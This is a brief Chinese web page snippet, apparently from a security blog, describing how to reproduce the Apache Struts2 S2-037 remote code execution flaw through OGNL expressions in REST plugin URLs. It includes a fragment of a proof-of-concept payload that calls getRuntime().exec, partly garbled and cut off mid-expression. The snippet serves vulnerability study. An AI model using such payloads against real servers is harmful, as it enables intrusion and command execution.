0x29. Apache Struts2远程代码执行漏洞(S2-037)复现

s2-037:使用REST插件启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式;使用http://localhost:8080/1/XXX这种请求方式,XXX可以是任何合法的名字 ,通过将XXX构造为OGNL执行命令; poc: #[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getRuntime().ex
相关文章
相关标签/搜索